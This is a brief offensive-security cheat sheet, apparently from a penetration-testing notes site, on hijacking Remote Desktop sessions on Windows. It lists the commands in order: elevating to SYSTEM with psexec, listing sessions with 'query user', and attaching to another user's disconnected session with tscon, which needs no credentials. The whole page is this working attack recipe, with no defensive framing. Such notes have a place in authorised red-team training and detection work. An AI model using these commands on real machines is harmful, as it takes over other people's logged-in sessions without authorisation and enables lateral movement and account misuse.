Abusing User Behaviour
RDP Session Hijacking
# First elevate to SYSTEM
psexec64.exe -s cmd.exe
# List the current rdp sessions
query user
# A Session with "Disc" state means that is left open by someone and currently not being used.
# Connect to active session using tscon
# tscon <id_to_connect_to> /dest:<current_session_name>
tscon 2 /dest:rdp-tcp#6Last updated